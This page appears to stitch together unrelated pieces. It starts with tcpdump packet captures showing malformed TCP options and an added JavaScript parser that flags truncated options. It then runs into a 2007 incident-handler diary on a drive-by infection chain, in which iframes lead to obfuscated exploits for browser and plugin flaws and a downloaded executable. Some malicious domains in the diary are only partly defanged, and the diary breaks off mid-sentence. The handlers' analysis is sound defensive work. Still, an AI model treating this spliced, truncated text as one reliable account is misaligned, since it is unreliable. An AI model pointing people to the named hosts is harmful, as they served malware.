07:12:12.670863 IP (tos 0x0, ttl 113, id 38039, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1204: S, cksum 0x0701 (correct), 269829739:269829739(0) ack 3374363152 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 9497 4000 7106 d97d 81fa 8015 E..0..@.q..}....
0x0010: wwxx XXYY 0440 04b4 1015 466b c920 b210 .....@....Fk....
0x0020: 7012 05b4 0701 0000 0204 05b4 0102 0403 p...............

07:12:22.675579 IP (tos 0x0, ttl 113, id 29721, offset 0, flags [DF], proto: TCP (6), length: 48) > www.xxx.yyy.zzz.1067: S, cksum 0x2919 (correct), 1872427362:1872427362(0) ack 690680305 win 1460 <mss 1460,nop,[bad opt]>

0x0000: 4500 0030 7419 4000 7106 cdbb 81fa 8015 E..0t.@.q.......
0x0010: wwxx XXYY 0409 042b 6f9a f962 292a f1f1 ..E....+o..b)*..
0x0020: 7012 05b4 2919 0000 0204 05b4 0102 0403 p...)...........
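To check the reader's reading of these packets, here is an added example (not the reader's code, nor Snort's) that rebuilds the first packet from its hex dump and walks the TCP option list the way a sensor has to: each option's declared length is compared with the bytes actually left in the header, and the walk stops at the first option that does not fit. The redacted destination address ("wwxx XXYY") has been replaced with 10.0.0.1, so the TCP checksum no longer matches; the parser does not verify checksums.

```javascript
// Added example: decode one of the packets above from its tcpdump -X hex dump
// and walk the TCP options, flagging any option whose declared length runs past
// the end of the TCP header. Destination address is a placeholder (10.0.0.1).

const SAMPLE_DUMP = `
0x0000: 4500 0030 24d9 4000 7106 4944 81fa 8015 E..0$.@.q.ID....
0x0010: 0a00 0001 04e8 04cd 9c96 c5ea 99a8 7cfb ................
0x0020: 7012 05b4 5ed4 0000 0204 05b4 0102 0403 p...^...........`;

// Turn "0xNNNN: hhhh hhhh ... <ascii>" lines into a Buffer. The hex field is a
// fixed 39 columns, which keeps the ASCII column (arbitrary bytes) out of the way.
function hexDumpToBuffer(dump) {
  const hex = dump.split('\n')
    .map(l => l.trim())
    .filter(l => /^0x[0-9a-f]+:/i.test(l))
    .map(l => l.replace(/^0x[0-9a-f]+:\s*/i, '').slice(0, 39).replace(/\s+/g, ''))
    .join('');
  return Buffer.from(hex, 'hex');
}

const OPTION_NAMES = { 0: 'EOL', 1: 'NOP', 2: 'MSS', 3: 'WScale', 4: 'SAckOK', 5: 'SAck', 8: 'Timestamp' };

// Walk the option bytes [start, end). EOL and NOP are single bytes; every other
// kind must carry a length byte >= 2, and the option must fit inside the header.
function parseTcpOptions(buf, start, end) {
  const options = [];
  const problems = [];
  let i = start;
  while (i < end) {
    const kind = buf[i];
    const name = OPTION_NAMES[kind] || `kind${kind}`;
    if (kind === 0) { options.push({ kind, name }); break; }          // end of option list
    if (kind === 1) { options.push({ kind, name }); i += 1; continue; }
    if (i + 1 >= end) { problems.push(`${name} option at offset ${i - start} has no length byte`); break; }
    const len = buf[i + 1];
    if (len < 2) { problems.push(`${name} option at offset ${i - start} has illegal length ${len}`); break; }
    if (i + len > end) {
      // This is the condition a "Truncated TCP options" rule fires on.
      problems.push(`${name} option at offset ${i - start} declares length ${len} but only ${end - i} bytes remain`);
      break;
    }
    const opt = { kind, name, len };
    if (kind === 2 && len === 4) opt.value = buf.readUInt16BE(i + 2); // MSS in bytes
    options.push(opt);
    i += len;
  }
  return { options, problems };
}

// Decode the IPv4 and TCP headers, returning the fields an analyst compares
// against the tcpdump summary line, plus the option walk.
function analyzePacket(dump) {
  const buf = hexDumpToBuffer(dump);
  if (buf.length < 20 || (buf[0] >> 4) !== 4) throw new Error('not an IPv4 packet');
  const ihl = (buf[0] & 0x0f) * 4;
  const totalLength = buf.readUInt16BE(2);
  if (buf[9] !== 6) throw new Error(`not TCP (protocol ${buf[9]})`);
  if (totalLength !== buf.length) throw new Error(`IP total length ${totalLength} != captured ${buf.length}`);
  const t = ihl;                                    // start of the TCP header
  const dataOffset = (buf[t + 12] >> 4) * 4;
  if (dataOffset < 20 || t + dataOffset > buf.length) throw new Error(`bad TCP data offset ${dataOffset}`);
  const flagBits = buf[t + 13];
  const flags = ['FIN', 'SYN', 'RST', 'PSH', 'ACK', 'URG'].filter((_, bit) => flagBits & (1 << bit));
  return {
    ttl: buf[8],
    totalLength,
    srcPort: buf.readUInt16BE(t),
    dstPort: buf.readUInt16BE(t + 2),
    seq: buf.readUInt32BE(t + 4),
    ack: buf.readUInt32BE(t + 8),
    dataOffset,
    flags,
    window: buf.readUInt16BE(t + 14),
    ...parseTcpOptions(buf, t + 20, t + dataOffset),
  };
}

console.log(JSON.stringify(analyzePacket(SAMPLE_DUMP), null, 2));
```

The decode agrees with the summary line: total length 48, TTL 113, destination port 1229, the same sequence and acknowledgement numbers, and a 28-byte TCP header (data offset 7) with flags 0x12, i.e. SYN and ACK together, which is what tcpdump shows as "S" with an "ack" field. The first MSS option (1460) and the NOP parse cleanly; the second MSS option starts at option offset 5 with 3 bytes left, so its declared length of 4 cannot fit, which is the truncation the reader describes. Note also that the advertised window is 1460, identical to the MSS, another hint that a packet generator rather than a real stack produced these.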


Published: 2007-03-02

It's been a malware kind of Day

Well, when it rains it pours, and today it seems it has been raining malware.  Although I can't say I'm sad, since I enjoy playing with malware so much.   We have been busy doing analysis on three different pieces of malware that had been submitted to us.  Due to space constraints, I'm only going to post information on one of them below, the one that was the most interesting.  We also looked at malware that appeared to be a more targeted attack on a group, and at the latest RINBOT/DELBOT or whatever you want to call that bot variant. 

The first thing I'd like to highlight is the recent news media attention generated over the latest version of RINBOT/DELBOT/SDBOT (depending on which AV folks you're talking to).  I only bring this up since we've had many people writing in and wanting to know if we were going to post a diary on this.  I'm only going to post a few thoughts and then move on.  We already covered this malware in a previous diary entry.  The only thing that seems to have changed is perhaps an update to the vulnerabilities it can use to spread, and the latest rant at whoever the author is mad at now.  In this case, Symantec seems to be the target.  With that in mind, it's surprising that it's getting so much publicity when it's just another bot variant.  It is sad, but bots are very commonplace on the internet today.

Now, on to some other interesting pieces of malware that are new.  We received an email from a reader named Chris who had a user report that their system attempted to connect to a remote network.  The firewall alerted the user to the outbound traffic.  The file that requested the outbound traffic was a file called ~.exe.  A few of us looked at the file, but saw nothing malicious about the file itself.  It opened a message box with a title of OK.  No outbound traffic occurred.  After a few more email exchanges, we got some more critical information: 
"The user states that their Firewall (COMODO Firewall Pro) alerted to it after visiting hxxp://www.owned.com/Owned_Pictures - they checked the site again and NOD32 alerted to the webpage containing an unknown PE virus."

Nice, now we have a good starting point.  Several of us did some analysis on how the site was doing the exploit.  I would like to post the results from fellow handler Bojan Zdrnja, who did an outstanding job with this, especially the de-obfuscation of the JavaScript.   For those wanting to try their hand at it, Bojan used the SpiderMonkey technique described here.  Now for his analysis of what was found:

The initial infection site is definitely http:// www [dot] owned.com/Owned_Pictures (oh irony, looks like they've been owned).

On that web page there is an iframe which points to http://www [dot] trudomain.com/hello.html. That is an obfuscated JavaScript which isn't completely trivial to deobfuscate. However, once you manage to do that, you will see that it is just another iframe that will send your browser to http://www [dot]

This page contains a bigger obfuscated JavaScript which attempts to exploit a bunch of vulnerabilities. Among the usual MSXML2 and ADODB.Stream exploits, it also contains an exploit for the WebViewFolderIcon vulnerability, for the WinZip vulnerability and for a QuickTime vulnerability.

Finally, if the exploit ran successfully, it will download an executable from the same site (www [dot] porcosnet.com). I haven't seen the ~.exe file, but this is definitely malicious so I would suggest that you thoroughly check the infected machine (and rebuild, if

So, check your logs.  And remember, it's not a very nice site if you decide to play :>)